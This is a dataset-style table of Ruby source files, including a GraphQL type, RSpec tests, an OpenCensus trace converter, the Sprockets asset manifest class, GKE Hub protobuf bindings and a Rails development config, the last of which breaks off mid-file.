hexsha (string, length 40) | size (int64, 2-1.01M) | content (string, 2-1.01M) | avg_line_length (float64, 1.5-100) | max_line_length (int64, 2-1k) | alphanum_fraction (float64, 0.25-1) |
---|---|---|---|---|---|
e2e62a706fdcb28eabc556fc598f207bc767458b | 1,280 | # frozen_string_literal: true
Types::PostType = GraphQL::ObjectType.define do
name 'Post'
field :title, types.String
field :body, types.String
field :link, types.String
field :post_creation_date, Types::DateTimeType
field :site, Types::SiteType
field :user_link, types.String
field :username, types.String
field :why, types.String
field :user_reputation, types.Int
field :upvote_count, types.Int
field :downvote_count, types.Int
field :score, types.Int
field :feedbacks, types[Types::FeedbackType]
field :stack_exchange_user, Types::StackExchangeUserType
field :is_tp, types.Boolean
field :is_fp, types.Boolean
field :is_naa, types.Boolean
field :revision_count, types.Int
field :deleted_at, Types::DateTimeType
field :smoke_detector, Types::SmokeDetectorType
field :autoflagged, types.Boolean
field :tags, types.String
field :feedbacks_count, types.Int
field :native_id, types.Int
field :reasons, types[Types::ReasonType]
field :spam_domains, types[Types::SpamDomainType]
field :flag_logs, types[Types::FlagLogType]
field :comments, types[Types::PostCommentType]
field :post_tags, types[Types::DomainTagType]
field :created_at, Types::DateTimeType
field :updated_at, Types::DateTimeType
field :id, types.ID
end
| 32.820513 | 58 | 0.761719 |
112fb5836be8f0b3e72c9184982f7df1c7d8f2f7 | 2,690 | require "spec_helper"
describe EA::AreaLookup do
describe "Finders" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 654_321, northing: 123_456) }
let(:api_url) { "http://environment.data.gov.uk/ds/wfs" }
it "has a version number" do
expect(EA::AreaLookup::VERSION).not_to be nil
end
context "admin area happy path" do
before { EA::AreaLookup.config.area_api_url = api_url }
context "area found" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 358_205.03, northing: 172_708.07) }
it "returns hash with area info" do
VCR.use_cassette("admin_area_found") do
hash = described_class.find_admin_area_by_coordinates(coords)
expect(hash).to eq(area_id: "28.000000000000000",
code: "WESSEX",
area_name: "Wessex",
short_name: "Wessex",
long_name: "Wessex")
end
end
end
context "admin area not found" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 1, northing: 2) }
it "returns empty hash" do
VCR.use_cassette("admin_area_not_found") do
hash = described_class.find_admin_area_by_coordinates(coords)
expect(hash).to eq(area_id: "",
code: "",
area_name: "",
short_name: "",
long_name: "")
end
end
end
end
context "sad path" do
describe "Exception handling" do
after(:each) { EA::AreaLookup.reset }
it "raises an error if admin area api url is missing in config" do
EA::AreaLookup.configure { |config| config.area_api_url = nil }
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::InvalidConfigError)
end
it "raises an error if connection cannot be made to the api" do
EA::AreaLookup.config.area_api_url = "http://asdasdasdasd.example.com"
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::ApiConnectionError)
end
it "raise an error if the request is malformed (see cassette)" do
EA::AreaLookup.config.area_api_url = api_url
VCR.use_cassette("admin_area_malformed_request") do
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::ApiInvalidRequestError)
end
end
end
end
end
end
| 38.428571 | 99 | 0.588104 |
01d7d6855338ebde4798574b52b693a6c54dd343 | 5,232 | require 'spec_helper'
describe Beaker::VagrantVirtualbox do
let( :options ) { make_opts.merge({ :hosts_file => 'sample.cfg', 'logger' => double().as_null_object }) }
let( :vagrant ) { Beaker::VagrantVirtualbox.new( @hosts, options ) }
let(:vagrantfile_path) do
path = vagrant.instance_variable_get( :@vagrant_path )
File.expand_path( File.join( path, 'Vagrantfile' ))
end
before :each do
@hosts = make_hosts()
end
it "uses the virtualbox provider for provisioning" do
@hosts.each do |host|
host_prev_name = host['user']
expect( vagrant ).to receive( :set_ssh_config ).with( host, 'vagrant' ).once
expect( vagrant ).to receive( :copy_ssh_to_root ).with( host, options ).once
expect( vagrant ).to receive( :set_ssh_config ).with( host, host_prev_name ).once
end
expect( vagrant ).to receive( :hack_etc_hosts ).with( @hosts, options ).once
expect( vagrant ).to receive( :vagrant_cmd ).with( "up --provider virtualbox" ).once
vagrant.provision
end
it "can make a Vagranfile for a set of hosts" do
path = vagrant.instance_variable_get( :@vagrant_path )
allow( vagrant ).to receive( :randmac ).and_return( "0123456789" )
vagrant.make_vfile( @hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include( %Q{ v.vm.provider :virtualbox do |vb|\n vb.customize ['modifyvm', :id, '--memory', '1024', '--cpus', '1', '--audio', 'none']\n end})
end
it "can disable the vb guest plugin" do
options.merge!({ :vbguest_plugin => 'disable' })
vfile_section = vagrant.class.provider_vfile_section( @hosts.first, options )
match = vfile_section.match(/vb.vbguest.auto_update = false/)
expect( match ).to_not be nil
end
it "can enable ioapic(multiple cores) on hosts" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:ioapic => 'true'},1)
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--ioapic', 'on']")
end
it "can enable NAT DNS on hosts" do
hosts = make_hosts({:natdns => 'on'},1)
vagrant.make_vfile( hosts )
vagrantfile = File.read( vagrantfile_path )
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--natdnshostresolver1', 'on']")
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--natdnsproxy1', 'on']")
end
it "correctly provisions storage with the USB controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}, :volume_storage_controller => 'USB' })
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['modifyvm', :id, '--usb', 'on']")
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker USB Controller', '--add', 'usb', '--portcount', '8', '--controller', 'USB', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker USB Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
it "correctly provisions storage with the LSILogic controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}, :volume_storage_controller => 'LSILogic' })
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker LSILogic Controller', '--add', 'scsi', '--portcount', '16', '--controller', 'LSILogic', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker LSILogic Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
it "correctly provisions storage with the default controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}})
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker IntelAHCI Controller', '--add', 'sata', '--portcount', '2', '--controller', 'IntelAHCI', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker IntelAHCI Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
end
| 51.80198 | 205 | 0.655199 |
d5faed418138732924933954a7c0cb519ab50cc8 | 366 | require "dropbox_product_updates/version"
module DropboxProductUpdates
require "dropbox_product_updates/product"
require "dropbox_product_updates/product_data"
def self.update_all_products(path = nil, token = nil)
ImportProductData.update_all_products(path, token)
'Successful Import (More info soon...)'
end
end
| 24.4 | 53 | 0.775956 |
4ae5ee7f2b1d8f5514264be83570d98cc0682286 | 703 | Rails.application.routes.draw do
get "password_resets/new"
get "password_resets/edit"
root "static_pages#home"
get "/readme", to: "static_pages#readme"
get "/contact", to: "static_pages#contact"
get "/signup", to: "users#new"
resources :users do
member do
get :following, :followers
end
end
get "/login", to: "sessions#new"
post "/login", to: "sessions#create"
get "/guest", to: "sessions#guest"
delete "/logout", to: "sessions#destroy"
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 28.12 | 67 | 0.682788 |
7a27c9ad517c83e30a877acd76cf72e069cefb38 | 7,894 | require 'google/protobuf/well_known_types'
require 'gruf'
require 'opencensus/proto/agent/common/v1/common_pb'
require 'opencensus/proto/agent/trace/v1/trace_service_pb'
require 'opencensus/proto/agent/trace/v1/trace_service_services_pb'
require 'opencensus/trace/exporters/ocagent/export_request_enumerator'
module OpenCensus
module Trace
module Exporters
class OCAgent
class Converter
TraceProtos = ::OpenCensus::Proto::Trace
AgentProtos = ::OpenCensus::Proto::Agent
def initialize
@stack_trace_hash_ids = {}
end
def convert_spans(spans)
span_protos = spans.map { |span| convert_span(span) } # reuse this converter so stack trace hash ids dedup across the batch
OCAgent::ExportRequestEnumerator.new(span_protos)
end
def convert_span(span_data)
return if span_data.nil?
TraceProtos::V1::Span.new(
name: truncatable_string(span_data.name.value, span_data.name.truncated_byte_count),
kind: span_data.kind,
trace_id: span_data.trace_id,
span_id: span_data.span_id,
parent_span_id: span_data.parent_span_id,
start_time: pb_timestamp(span_data.start_time),
end_time: pb_timestamp(span_data.end_time),
status: convert_status(span_data.status),
child_span_count: optional_uint32(span_data.child_span_count),
attributes: convert_attributes(span_data.attributes, span_data.dropped_attributes_count),
stack_trace: convert_stack_trace(span_data.stack_trace,
span_data.dropped_frames_count,
span_data.stack_trace_hash_id),
time_events: convert_time_events(span_data.time_events,
span_data.dropped_annotations_count,
span_data.dropped_message_events_count),
links: convert_links(span_data.links, span_data.dropped_links_count),
same_process_as_parent_span: optional_bool(span_data.same_process_as_parent_span),
)
end
def optional_uint32(val)
return if val.nil?
Google::Protobuf::Uint32Value.new(value: val)
end
def optional_bool(val)
return if val.nil?
Google::Protobuf::BoolValue.new(value: val)
end
def truncatable_string(str, truncated_byte_count = 0)
TraceProtos::V1::TruncatableString.new(value: str, truncated_byte_count: truncated_byte_count)
end
def pb_timestamp(time)
Google::Protobuf::Timestamp.new(seconds: time.to_i, nanos: time.nsec)
end
def pb_status(status)
return if status.nil?
TraceProtos::V1::Status.new(
code: status.canonical_code,
message: status.description
)
end
def convert_attributes(attributes, dropped_attributes_count)
attribute_map = {}
attributes.each do |key, value|
attribute_map[key] = convert_attribute_value(value)
end
TraceProtos::V1::Span::Attributes.new(
attribute_map: attribute_map,
dropped_attributes_count: dropped_attributes_count
)
end
def convert_attribute_value(value)
case value
when OpenCensus::Trace::TruncatableString
TraceProtos::V1::AttributeValue.new(string_value: TraceProtos::V1::TruncatableString.new(value: value.value, truncated_byte_count: value.truncated_byte_count))
when TrueClass, FalseClass
TraceProtos::V1::AttributeValue.new(bool_value: value)
when Integer
TraceProtos::V1::AttributeValue.new(int_value: value)
else
nil # unsupported attribute value types are dropped
end
end
def convert_stack_trace(stack_trace, dropped_frames_count, stack_trace_hash_id)
# TODO: For whatever reason, some of these are coming in negative, despite the field being unsigned
stack_trace_hash_id = 0 if stack_trace_hash_id.nil? || stack_trace_hash_id < 0
# If the hash id already exists, then just return
if stack_trace_hash_id > 0 && @stack_trace_hash_ids[stack_trace_hash_id]
return TraceProtos::V1::StackTrace.new(stack_trace_hash_id: stack_trace_hash_id)
end
# Otherwise, construct
@stack_trace_hash_ids[stack_trace_hash_id] = true
frame_protos = stack_trace.map { |frame| convert_stack_frame(frame) }
frames_proto = TraceProtos::V1::StackTrace::StackFrames.new(
frame: frame_protos,
dropped_frames_count: dropped_frames_count
)
TraceProtos::V1::StackTrace.new(stack_frames: frames_proto, stack_trace_hash_id: stack_trace_hash_id)
end
# https://ruby-doc.org/core-2.5.0/Thread/Backtrace/Location.html
def convert_stack_frame(frame)
TraceProtos::V1::StackTrace::StackFrame.new(
function_name: truncatable_string(frame.label),
file_name: truncatable_string(frame.path),
line_number: frame.lineno
)
end
def convert_time_events(events, dropped_annotations_count, dropped_message_events_count)
event_protos = events.map do |event|
case event
when OpenCensus::Trace::Annotation
convert_annotation(event)
when OpenCensus::Trace::MessageEvent
# message events are not converted yet; the resulting nil is removed by #compact below
else
nil
end
end.compact
TraceProtos::V1::Span::TimeEvents.new(
time_event: event_protos,
dropped_annotations_count: dropped_annotations_count,
dropped_message_events_count: dropped_message_events_count
)
end
def convert_links(links, dropped_links_count)
converted_links = links.map do |link|
convert_link(link)
end
TraceProtos::V1::Span::Links.new(
link: converted_links,
dropped_links_count: dropped_links_count,
)
end
def convert_link(link)
TraceProtos::V1::Span::Link.new(
trace_id: link.trace_id,
span_id: link.span_id,
type: link.type,
attributes: convert_attributes(link.attributes, link.dropped_attributes_count)
)
end
def convert_annotation(annotation)
annotation_proto = TraceProtos::V1::Span::TimeEvent::Annotation.new(
description: truncatable_string(annotation.description.value,
annotation.description.truncated_byte_count),
attributes: convert_attributes(annotation.attributes,
annotation.dropped_attributes_count)
)
# Wrap the annotation in a TimeEvent, as expected by Span::TimeEvents#time_event
TraceProtos::V1::Span::TimeEvent.new(
time: pb_timestamp(annotation.time),
annotation: annotation_proto
)
end
def convert_status(status)
return if status.nil?
TraceProtos::V1::Status.new(code: status.code, message: status.message)
end
def add_pb_attributes(pb_attributes, key, value)
case value
when TrueClass, FalseClass
pb_attributes.attribute_map[key].bool_value = value
when Integer
pb_attributes.attribute_map[key].int_value = value
when String
pb_attributes.attribute_map[key].string_value = value
when Float
pb_attributes.attribute_map[key].double_value = value
else
pb_attributes.attribute_map[key].string_value = value
end
end
end
end
end
end
end
| 39.079208 | 173 | 0.602736 |
e89abf3e0dad3d23187f82a09177e649479eac93 | 8,573 | require 'json'
require 'time'
require 'concurrent'
require 'sprockets/manifest_utils'
require 'sprockets/utils/gzip'
module Sprockets
# The Manifest logs the contents of assets compiled to a single directory. It
# records basic attributes about the asset for fast lookup without having to
# compile. A pointer from each logical path indicates which fingerprinted
# asset is the current one.
#
# The JSON is part of the public API and should be considered stable. This
# should make it easy to read from other programming languages and processes
# that don't have sprockets loaded. See `#assets` and `#files` for more
# information about the structure.
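#
# For example (illustrative; the actual manifest filename is randomized),
# a process without sprockets loaded could read it with plain JSON tooling:
#
# data = JSON.parse(File.read(".sprockets-manifest-abc123.json"))
# data["assets"]["application.js"]
# # => "application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js"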
class Manifest
include ManifestUtils
attr_reader :environment
# Create new Manifest associated with an `environment`. `filename` is a full
# path to the manifest json file. The file may or may not already exist. The
# dirname of the `filename` will be used to write compiled assets to.
# Otherwise, if the path is a directory, the filename will default to a random
# ".sprockets-manifest-*.json" file in that directory.
#
# Manifest.new(environment, "./public/assets/manifest.json")
#
def initialize(*args)
if args.first.is_a?(Base) || args.first.nil?
@environment = args.shift
end
@directory, @filename = args[0], args[1]
# Whether the manifest file is using the old manifest-*.json naming convention
@legacy_manifest = false
# Expand paths
@directory = File.expand_path(@directory) if @directory
@filename = File.expand_path(@filename) if @filename
# If filename is given as the second arg
if @directory && File.extname(@directory) != ""
@directory, @filename = nil, @directory
end
# Default dir to the directory of the filename
@directory ||= File.dirname(@filename) if @filename
# If directory is given w/o filename, pick a random manifest location
if @directory && @filename.nil?
@filename = find_directory_manifest(@directory)
end
unless @directory && @filename
raise ArgumentError, "manifest requires output filename"
end
data = {}
begin
if File.exist?(@filename)
data = json_decode(File.read(@filename))
end
rescue JSON::ParserError => e
logger.error "#{@filename} is invalid: #{e.class} #{e.message}"
end
@data = data
end
# Returns String path to manifest.json file.
attr_reader :filename
alias_method :path, :filename
attr_reader :directory
alias_method :dir, :directory
# Returns internal assets mapping. Keys are logical paths which
# map to the latest fingerprinted filename.
#
# Logical path (String): Fingerprint path (String)
#
# { "application.js" => "application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js",
# "jquery.js" => "jquery-ae0908555a245f8266f77df5a8edca2e.js" }
#
def assets
@data['assets'] ||= {}
end
# Returns internal file directory listing. Keys are filenames
# which map to an attributes array.
#
# Fingerprint path (String):
# logical_path: Logical path (String)
# mtime: ISO8601 mtime (String)
# digest: Base64 hex digest (String)
#
# { "application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js" =>
# { 'logical_path' => "application.js",
# 'mtime' => "2011-12-13T21:47:08-06:00",
# 'digest' => "2e8e9a7c6b0aafa0c9bdeec90ea30213" } }
#
def files
@data['files'] ||= {}
end
# Public: Find all assets matching pattern set in environment.
#
# Returns Enumerator of Assets.
def find(*args)
unless environment
raise Error, "manifest requires environment for compilation"
end
return to_enum(__method__, *args) unless block_given?
environment = self.environment.cached
args.flatten.each do |path|
environment.find_all_linked_assets(path) do |asset|
yield asset
end
end
nil
end
# Compile and write asset to directory. The asset is written to a
# fingerprinted filename like
# `application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js`. An entry is
# also inserted into the manifest file.
#
# compile("application.js")
#
def compile(*args)
unless environment
raise Error, "manifest requires environment for compilation"
end
filenames = []
concurrent_compressors = []
concurrent_writers = []
find(*args) do |asset|
files[asset.digest_path] = {
'logical_path' => asset.logical_path,
'mtime' => Time.now.iso8601,
'size' => asset.bytesize,
'digest' => asset.hexdigest,
# Deprecated: Remove beta integrity attribute in next release.
# Callers should DigestUtils.hexdigest_integrity_uri to compute the
# digest themselves.
'integrity' => DigestUtils.hexdigest_integrity_uri(asset.hexdigest)
}
assets[asset.logical_path] = asset.digest_path
target = File.join(dir, asset.digest_path)
if File.exist?(target)
logger.debug "Skipping #{target}, already exists"
else
logger.info "Writing #{target}"
write_file = Concurrent::Future.execute { asset.write_to target }
concurrent_writers << write_file
end
filenames << asset.filename
next if environment.skip_gzip?
gzip = Utils::Gzip.new(asset)
next if gzip.cannot_compress?(environment.mime_types)
if File.exist?("#{target}.gz")
logger.debug "Skipping #{target}.gz, already exists"
else
logger.info "Writing #{target}.gz"
concurrent_compressors << Concurrent::Future.execute do
write_file.wait! if write_file
gzip.compress(target)
end
end
end
concurrent_writers.each(&:wait!)
concurrent_compressors.each(&:wait!)
save
filenames
end
# Removes file from directory and from manifest. `filename` must
# be the name with any directory path.
#
# manifest.remove("application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js")
#
def remove(filename)
path = File.join(dir, filename)
gzip = "#{path}.gz"
logical_path = files[filename]['logical_path']
if assets[logical_path] == filename
assets.delete(logical_path)
end
files.delete(filename)
FileUtils.rm(path) if File.exist?(path)
FileUtils.rm(gzip) if File.exist?(gzip)
save
logger.info "Removed #{filename}"
nil
end
# Cleanup old assets in the compile directory. By default it will
# keep the latest version, 2 backups and any created within the past hour.
#
# Examples
#
# To force only 1 backup to be kept, set count=1 and age=0.
#
# To only keep files created within the last 10 minutes, set count=0 and
# age=600.
#
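# manifest.clean(1, 0) # keep the latest version plus one backup
# manifest.clean(0, 600) # keep only files created in the last 10 minutes
#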
def clean(count = 2, age = 3600)
asset_versions = files.group_by { |_, attrs| attrs['logical_path'] }
asset_versions.each do |logical_path, versions|
current = assets[logical_path]
versions.reject { |path, _|
path == current
}.sort_by { |_, attrs|
# Sort by timestamp
Time.parse(attrs['mtime'])
}.reverse.each_with_index.drop_while { |(_, attrs), index|
_age = [0, Time.now - Time.parse(attrs['mtime'])].max
# Keep if under age or within the count limit
_age < age || index < count
}.each { |(path, _), _|
# Remove old assets
remove(path)
}
end
end
# Wipe directive
def clobber
FileUtils.rm_r(directory) if File.exist?(directory)
logger.info "Removed #{directory}"
nil
end
# Persist manifest back to FS
def save
data = json_encode(@data)
FileUtils.mkdir_p File.dirname(@filename)
PathUtils.atomic_write(@filename) do |f|
f.write(data)
end
end
private
def json_decode(obj)
JSON.parse(obj, create_additions: false)
end
def json_encode(obj)
JSON.generate(obj)
end
def logger
if environment
environment.logger
else
logger = Logger.new($stderr)
logger.level = Logger::FATAL
logger
end
end
end
end
| 29.767361 | 84 | 0.623819 |
4a59e6c081f934bb20d27500acb4c9e4f3bb8519 | 7,010 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/gkehub/v1/service.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/cloud/gkehub/v1/feature_pb'
require 'google/cloud/gkehub/v1/membership_pb'
require 'google/longrunning/operations_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/gkehub/v1/service.proto", :syntax => :proto3) do
add_message "google.cloud.gkehub.v1.ListMembershipsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
optional :order_by, :string, 5
end
add_message "google.cloud.gkehub.v1.ListMembershipsResponse" do
repeated :resources, :message, 1, "google.cloud.gkehub.v1.Membership"
optional :next_page_token, :string, 2
repeated :unreachable, :string, 3
end
add_message "google.cloud.gkehub.v1.GetMembershipRequest" do
optional :name, :string, 1
end
add_message "google.cloud.gkehub.v1.CreateMembershipRequest" do
optional :parent, :string, 1
optional :membership_id, :string, 2
optional :resource, :message, 3, "google.cloud.gkehub.v1.Membership"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.DeleteMembershipRequest" do
optional :name, :string, 1
optional :request_id, :string, 2
end
add_message "google.cloud.gkehub.v1.UpdateMembershipRequest" do
optional :name, :string, 1
optional :update_mask, :message, 2, "google.protobuf.FieldMask"
optional :resource, :message, 3, "google.cloud.gkehub.v1.Membership"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.GenerateConnectManifestRequest" do
optional :name, :string, 1
optional :namespace, :string, 2
optional :proxy, :bytes, 3
optional :version, :string, 4
optional :is_upgrade, :bool, 5
optional :registry, :string, 6
optional :image_pull_secret_content, :bytes, 7
end
add_message "google.cloud.gkehub.v1.GenerateConnectManifestResponse" do
repeated :manifest, :message, 1, "google.cloud.gkehub.v1.ConnectAgentResource"
end
add_message "google.cloud.gkehub.v1.ConnectAgentResource" do
optional :type, :message, 1, "google.cloud.gkehub.v1.TypeMeta"
optional :manifest, :string, 2
end
add_message "google.cloud.gkehub.v1.TypeMeta" do
optional :kind, :string, 1
optional :api_version, :string, 2
end
add_message "google.cloud.gkehub.v1.ListFeaturesRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
optional :order_by, :string, 5
end
add_message "google.cloud.gkehub.v1.ListFeaturesResponse" do
repeated :resources, :message, 1, "google.cloud.gkehub.v1.Feature"
optional :next_page_token, :string, 2
end
add_message "google.cloud.gkehub.v1.GetFeatureRequest" do
optional :name, :string, 1
end
add_message "google.cloud.gkehub.v1.CreateFeatureRequest" do
optional :parent, :string, 1
optional :feature_id, :string, 2
optional :resource, :message, 3, "google.cloud.gkehub.v1.Feature"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.DeleteFeatureRequest" do
optional :name, :string, 1
optional :force, :bool, 2
optional :request_id, :string, 3
end
add_message "google.cloud.gkehub.v1.UpdateFeatureRequest" do
optional :name, :string, 1
optional :update_mask, :message, 2, "google.protobuf.FieldMask"
optional :resource, :message, 3, "google.cloud.gkehub.v1.Feature"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.OperationMetadata" do
optional :create_time, :message, 1, "google.protobuf.Timestamp"
optional :end_time, :message, 2, "google.protobuf.Timestamp"
optional :target, :string, 3
optional :verb, :string, 4
optional :status_detail, :string, 5
optional :cancel_requested, :bool, 6
optional :api_version, :string, 7
end
end
end
module Google
module Cloud
module GkeHub
module V1
ListMembershipsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListMembershipsRequest").msgclass
ListMembershipsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListMembershipsResponse").msgclass
GetMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GetMembershipRequest").msgclass
CreateMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.CreateMembershipRequest").msgclass
DeleteMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.DeleteMembershipRequest").msgclass
UpdateMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.UpdateMembershipRequest").msgclass
GenerateConnectManifestRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GenerateConnectManifestRequest").msgclass
GenerateConnectManifestResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GenerateConnectManifestResponse").msgclass
ConnectAgentResource = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ConnectAgentResource").msgclass
TypeMeta = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.TypeMeta").msgclass
ListFeaturesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListFeaturesRequest").msgclass
ListFeaturesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListFeaturesResponse").msgclass
GetFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GetFeatureRequest").msgclass
CreateFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.CreateFeatureRequest").msgclass
DeleteFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.DeleteFeatureRequest").msgclass
UpdateFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.UpdateFeatureRequest").msgclass
OperationMetadata = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.OperationMetadata").msgclass
end
end
end
end
| 51.167883 | 165 | 0.736805 |
bb409fdba74e23dd7f2c03b7dcc45307b5a773df | 3,260 | # frozen_string_literal: true
if RUBY_ENGINE == 'opal'
require_tree '../step'
else
require 'require_all'
require_rel '../step'
end
module Engine
module Round
class Base
attr_reader :entities, :entity_index, :round_num, :steps
DEFAULT_STEPS = [
Step::EndGame,
Step::Message,
].freeze
def initialize(game, steps, **opts)
@game = game
@entity_index = 0
@round_num = opts[:round_num] || 1
@entities = select_entities
@steps = (DEFAULT_STEPS + steps).map do |step, step_opts|
step_opts ||= {}
step = step.new(@game, self, **step_opts)
step.setup
step.round_state.each do |key, value|
singleton_class.class_eval { attr_accessor key }
send("#{key}=", value)
end
step
end
end
def setup; end
def name
raise NotImplementedError
end
def select_entities
raise NotImplementedError
end
def current_entity
active_entities[0]
end
def description
active_step.description
end
def active_entities
active_step&.active_entities || []
end
# TODO: This is deprecated
def can_act?(entity)
active_step&.current_entity == entity
end
def teleported?(_entity)
false
end
def pass_description
active_step.pass_description
end
def process_action(action)
type = action.type
clear_cache!
before_process(action)
step = @steps.find do |s|
next unless s.active?
process = s.actions(action.entity).include?(type)
blocking = s.blocking?
raise GameError, "Step #{s.description} cannot process #{action.to_h}" if blocking && !process
blocking || process
end
raise GameError, "No step found for action #{type} at #{action.id}" unless step
step.acted = true
step.send("process_#{action.type}", action)
skip_steps
clear_cache!
after_process(action)
end
def actions_for(entity)
actions = []
return actions unless entity
@steps.each do |step|
next unless step.active?
available_actions = step.actions(entity)
actions.concat(available_actions)
break if step.blocking?
end
actions.uniq
end
def active_step(entity = nil)
return @steps.find { |step| step.active? && step.actions(entity).any? } if entity
@active_step ||= @steps.find { |step| step.active? && step.blocking? }
end
def finished?
!active_step
end
def next_entity_index!
@entity_index = (@entity_index + 1) % @entities.size
end
def reset_entity_index!
@entity_index = 0
end
def clear_cache!
@active_step = nil
end
private
def skip_steps
@steps.each do |step|
next if !step.active? || !step.blocks?
break if step.blocking?
step.skip!
end
end
def before_process(_action); end
def after_process(_action); end
end
end
end
| 21.589404 | 104 | 0.572086 |
6a4b11eaf2fadc760b9fb86476d38adfb955e4f2 | 2,066 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
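# (In recent Rails versions the toggle file below can be created and
# removed with `bin/rails dev:cache`.)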
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
# TODO(javierhonduco): figure out if there's a better way
# of doing this (at least dehardcode the host)
config.action_mailer.default_url_options = { :host => "localhost:3000" }
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
